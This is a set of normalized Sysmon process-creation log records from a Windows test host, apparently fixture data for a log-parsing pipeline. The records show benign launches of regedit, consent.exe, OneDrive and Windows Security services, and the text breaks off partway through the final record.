"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:26.2613819Z\"},\"EventRecordID\":\"28072\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:26.252\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7aa-5ea4-0000-001066001700}\"},{\"Name\":\"ProcessId\",\"text\":\"4480\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\regedit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.168 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Registry Editor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"REGEDIT.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\regedit.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00206cd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d36c\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1D72449F04F2287A31A91024FC3E3ADA33322E72,MD5=A3668018735B59050AD123A5A8CDC184,SHA256=FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152,IMPHASH=7FEBF576192E34BDF7D07877CBACC413\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00206cd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "119660", "object.process.cmdline": "\"C:\\Windows\\regedit.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\regedit.exe", "object.process.guid": 
"747f3d96-b7aa-5ea4-0000-001066001700", "object.process.hash.imphash": "7FEBF576192E34BDF7D07877CBACC413", "object.process.hash.md5": "A3668018735B59050AD123A5A8CDC184", "object.process.hash.sha1": "1D72449F04F2287A31A91024FC3E3ADA33322E72", "object.process.hash.sha256": "FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152", "object.process.id": "4480", "object.process.meta": "Description:Registry Editor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "regedit.exe", "object.process.original_name": "REGEDIT.EXE", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\", "object.process.version": "10.0.17763.168 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "119660", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:26.252Z", "type": "raw", "uuid": "72682623-a260-4018-b7a3-d5e3d0d33916"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:21.2632329Z\"},\"EventRecordID\":\"28050\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:21.230\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a5-5ea4-0000-0010eab91300}\"},{\"Name\":\"ProcessId\",\"text\":\"7036\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.404 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"consent.exe\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 6964 258 0000021FF266EC20\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-0010a74d0b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6964\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 6964 258 0000021FF266EC20", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-b7a5-5ea4-0000-0010eab91300", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7036", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b776-5ea4-0000-0010a74d0b00", "object.process.parent.id": "6964", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.404 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:21.230Z", "type": "raw", "uuid": "e1865ecf-8d34-4c85-9bea-9f40349bf60f"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:21.2513938Z\"},\"EventRecordID\":\"28049\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:21.199\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a5-5ea4-0000-0010cab51300}\"},{\"Name\":\"ProcessId\",\"text\":\"3256\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\regedit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.168 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Registry Editor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"REGEDIT.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\regedit.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1D72449F04F2287A31A91024FC3E3ADA33322E72,MD5=A3668018735B59050AD123A5A8CDC184,SHA256=FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152,IMPHASH=7FEBF576192E34BDF7D07877CBACC413\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Windows\\regedit.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\regedit.exe", "object.process.guid": 
"747f3d96-b7a5-5ea4-0000-0010cab51300", "object.process.hash.imphash": "7FEBF576192E34BDF7D07877CBACC413", "object.process.hash.md5": "A3668018735B59050AD123A5A8CDC184", "object.process.hash.sha1": "1D72449F04F2287A31A91024FC3E3ADA33322E72", "object.process.hash.sha256": "FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152", "object.process.id": "3256", "object.process.meta": "Description:Registry Editor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "regedit.exe", "object.process.original_name": "REGEDIT.EXE", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\", "object.process.version": "10.0.17763.168 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:21.199Z", "type": "raw", "uuid": "e8f934b6-263b-47d6-b2aa-021cb2b2b0fb"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:18.9751995Z\"},\"EventRecordID\":\"28043\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:18.928\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a2-5ea4-0000-0010982f1200}\"},{\"Name\":\"ProcessId\",\"text\":\"864\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\"},{\"Name\":\"FileVersion\",\"text\":\"19.232.1124.0012\"},{\"Name\":\"Description\",\"text\":\"Microsoft OneDrive\"},{\"Name\":\"Product\",\"text\":\"Microsoft OneDrive\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"OneDrive.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" 
/background\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=C58446B3ABB7047BE3A581CCFD76329261BD5B9F,MD5=A82BFD1BBA73F453B27F146930AA8256,SHA256=6048931C40EFE6B73A6A541678D866E82C9ABEBA780FA61EB934AF124FB8F1BC,IMPHASH=67FA439780BDB54E74C4FA7BF8E5F089\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": 
"c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\onedrive.exe", "object.process.guid": "747f3d96-b7a2-5ea4-0000-0010982f1200", "object.process.hash.imphash": "67FA439780BDB54E74C4FA7BF8E5F089", "object.process.hash.md5": "A82BFD1BBA73F453B27F146930AA8256", "object.process.hash.sha1": "C58446B3ABB7047BE3A581CCFD76329261BD5B9F", "object.process.hash.sha256": "6048931C40EFE6B73A6A541678D866E82C9ABEBA780FA61EB934AF124FB8F1BC", "object.process.id": "864", "object.process.meta": "Description:Microsoft OneDrive | Product:Microsoft OneDrive | Company:Microsoft Corporation", "object.process.name": "onedrive.exe", "object.process.original_name": "OneDrive.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\", "object.process.version": "19.232.1124.0012", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:18.928Z", "type": "raw", "uuid": "5e45d100-028f-46a5-b2f7-75bf9f0745d5"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:16.9653442Z\"},\"EventRecordID\":\"27999\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:16.938\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a0-5ea4-0000-00108d131100}\"},{\"Name\":\"ProcessId\",\"text\":\"3376\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\19.232.1124.0012\\\\FileCoAuth.exe\"},{\"Name\":\"FileVersion\",\"text\":\"19.232.1124.0012\"},{\"Name\":\"Description\",\"text\":\"Microsoft OneDriveFile Co-Authoring Executable\"},{\"Name\":\"Product\",\"text\":\"Microsoft OneDrive\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"FileCoAuth.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\19.232.1124.0012\\\\FileCoAuth.exe 
-Embedding\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=61E5471B3D1B1FCF6D7ACAACB16E20AC759A6382,MD5=69FBC6D5F49A65860266E17018C55429,SHA256=BF5DD8456747FBA334FE22A5AA4BCC88B61BFBC7D5AC7990CC271C447DEB3409,IMPHASH=7AFCE357D7EB35125ABAE0BB8AB443EC\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010fe6f0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"808\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\OneDrive\\19.232.1124.0012\\FileCoAuth.exe -Embedding", "object.process.cwd": 
"C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\19.232.1124.0012\\filecoauth.exe", "object.process.guid": "747f3d96-b7a0-5ea4-0000-00108d131100", "object.process.hash.imphash": "7AFCE357D7EB35125ABAE0BB8AB443EC", "object.process.hash.md5": "69FBC6D5F49A65860266E17018C55429", "object.process.hash.sha1": "61E5471B3D1B1FCF6D7ACAACB16E20AC759A6382", "object.process.hash.sha256": "BF5DD8456747FBA334FE22A5AA4BCC88B61BFBC7D5AC7990CC271C447DEB3409", "object.process.id": "3376", "object.process.meta": "Description:Microsoft OneDriveFile Co-Authoring Executable | Product:Microsoft OneDrive | Company:Microsoft Corporation", "object.process.name": "filecoauth.exe", "object.process.original_name": "FileCoAuth.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010fe6f0000", "object.process.parent.id": "808", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\19.232.1124.0012\\", "object.process.version": "19.232.1124.0012", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:16.938Z", "type": "raw", "uuid": "02016029-4572-4cd6-b76c-72ffa30a97d3"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:16.1654826Z\"},\"EventRecordID\":\"27991\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:16.141\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a0-5ea4-0000-001027d81000}\"},{\"Name\":\"ProcessId\",\"text\":\"7088\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\SecurityHealthService.exe\"},{\"Name\":\"FileVersion\",\"text\":\"4.18.1807.16384 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Security Health Service\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"SecurityHealthService.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
